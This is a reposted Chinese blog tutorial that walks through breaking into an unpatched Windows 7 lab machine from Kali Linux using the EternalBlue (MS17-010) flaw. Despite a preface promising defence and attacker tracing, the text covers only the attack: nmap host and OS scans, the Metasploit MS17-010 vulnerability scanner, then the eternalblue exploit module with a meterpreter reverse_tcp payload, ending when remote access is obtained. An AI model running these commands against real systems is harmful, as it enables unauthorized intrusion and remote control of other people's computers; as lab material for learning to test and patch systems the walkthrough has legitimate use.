0


kali入侵win7(转载)

前言:

本文的目的并不是教会学者入侵win7主机,

而是被入侵之后怎么反制并且做好下一步的防范

以及查到攻击者的蛛丝马迹

攻击原理:

利用未修复永恒之蓝的445端口漏洞入侵目标主机

演示设备:
主机IPkali Linux10.11.4.3Windows710.11.4.152
(win7条件为无防火墙,无杀软)

攻击前准备:

  1. 扫描目标网段
  2. 扫描目标IP
  3. 使用msf工具的aux模块来测试目标是否能被正常攻击

1.1)--->扫描目标网段

开启kali终端输入

nmap -sP 10.11.4.0/24

nmap的参数-sP较为快速,意为进行ping扫描,打印出对扫描做出响应的主机,但不做进一步测试(如端口扫描或者操作系统探测)。

得到结果为

得到两个IP地址,一个为本机kali的IP地址10.11.4.3,另一个则为win7的IP地址10.11.4.152

1.2)--->扫描目标IP

在kali终端输入nmap -O 10.11.4.152

nmap的参数-O为系统类型扫描,同样会列出端口详细信息。

得到结果为:

可以看到要利用的445端口为open,即打开状态

1.3)--->使用msf工具的aux模块来测试目标是否能被正常攻击

输入msfconsole进入到msf工具

每次打开msf工具的图案都不相同,无须担心

搜寻相关的攻击辅助模块以及攻击模块

输入:

search ms17

得到:

第1个为扫描检测漏洞辅助模块(下标为1),第2个为要使用的攻击模块(eternalblue永恒之蓝)

加载扫描检测漏洞辅助模块

输入:

use auxiliary/scanner/smb/smb_ms17_010

得到:

进入到加载扫描检测漏洞辅助模块

检测需要传入什么参数

只需传入rhost

在这需要传入的参数比较简单,传入要被检测的目标IP即可

输入:

set rhost 10.11.4.152

得到:

传入rhost

接着执行这个已经设置好参数的探测模块

输入:

run

得到:

翻译为: 主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)

Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)

至此已成功一大半,下面让我们进行对目标主机的攻击

  1. 进入攻击模
  2. 查看参数并传入参数
  3. 执行攻击

2.1)--->进入攻击模块

输入:

use exploit/windows/smb/ms17_010_eternalblue

得到:

2.2)--->查看参数并传入参数

输入:

show options

得到:

需要设置的参数为payload(攻击载荷),rhost(目标IP)

输入:

set payload windows/x64/meterpreter/reverse_tcp

得到:

payload只需要配置监听返回会话的IP

输入:

set rhosts 10.11.4.152

得到:

设置目标IP

2.3)--->执行攻击

输入:

exploit

得到:

如果网络不好的话会在这里卡一会,或者目标系统有杀软的话,就会卡在这里

出现最下面的=-=-=-WIN=-=-=-就代表已成功拿到权限

标签: 安全 linux web安全

本文转载自: https://blog.csdn.net/m0_56071898/article/details/124579476
版权归原作者 啦啦啦??? 所有, 如有侵权,请联系我们删除。

“kali入侵win7(转载)”的评论:

还没有评论